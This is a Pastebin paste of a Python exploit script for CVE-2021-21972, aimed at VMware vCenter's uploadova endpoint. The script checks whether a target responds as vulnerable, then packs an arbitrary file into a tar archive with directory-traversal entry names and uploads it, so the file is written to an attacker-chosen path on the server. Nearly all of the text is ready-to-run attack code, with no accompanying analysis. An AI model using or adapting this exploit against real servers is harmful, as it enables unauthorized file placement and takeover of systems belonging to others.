ontosys

CVE-2021-21972

Apr 27th, 2021 (edited)
17
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. #!/usr/bin/python3
  2.  
  3. import argparse
  4. import requests
  5. import tarfile
  6. import urllib3
  7. urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
  8.  
  9. ENDPOINT = '/ui/vropspluginui/rest/services/uploadova'
  10.  
  11. def check(ip):
  12.     r = requests.get('https://' + ip + ENDPOINT, verify=False, timeout=30)
  13.     if r.status_code == 405:
  14.         print('[+] ' + ip + ' vulnerable to CVE-2021-21972!')
  15.         return True
  16.     else:
  17.         print('[-] ' + ip + ' not vulnerable to CVE-2021-21972. Response code: ' + str(r.status_code) + '.')
  18.         return False
  19.  
  20. def make_traversal_path(path, level=5, os="unix"):
  21.     if os == "win":
  22.         traversal = ".." + "\\"
  23.         fullpath = traversal*level + path
  24.         return fullpath.replace('/', '\\').replace('\\\\', '\\')
  25.     else:
  26.         traversal = ".." + "/"
  27.         fullpath = traversal*level + path
  28.         return fullpath.replace('\\', '/').replace('//', '/')
  29.  
  30. def archive(file, path, os):
  31.     tarf = tarfile.open('exploit.tar', 'w')
  32.     fullpath = make_traversal_path(path, level=5, os=os)
  33.     print('[+] Adding ' + file + ' as ' + fullpath + ' to archive')
  34.     tarf.add(file, fullpath)
  35.     tarf.close()
  36.     print('[+] Wrote ' + file + ' to exploit.tar on local filesystem')
  37.  
  38. def post(ip):
  39.     r = requests.post('https://' + ip + ENDPOINT, files={'uploadFile':open('exploit.tar', 'rb')}, verify=False, timeout=30)
  40.     if r.status_code == 200 and r.text == 'SUCCESS':
  41.         print('[+] File uploaded successfully')
  42.     else:
  43.         print('[-] File failed to upload the archive. The service may not have permissions for the specified path')
  44.         print('[-] Status Code: ' + str(r.status_code) + ', Response:\n' + r.text)
  45.  
  46. if __name__ == "__main__":
  47.     parser = argparse.ArgumentParser()
  48.     parser.add_argument('-t', '--target', help='The IP address of the target', required=True)
  49.     parser.add_argument('-f', '--file', help='The file to tar')
  50.     parser.add_argument('-p', '--path', help='The path to extract the file to on target')
  51.     parser.add_argument('-o', '--operating-system', help='The operating system of the VCSA server')
  52.     args = parser.parse_args()
  53.    
  54.     vulnerable = check(args.target)
  55.     if vulnerable and (args.file and args.path and args.operating_system):
  56.         archive(args.file, args.path, args.operating_system)
  57.         post(args.target)
  58.    
RAW Paste Data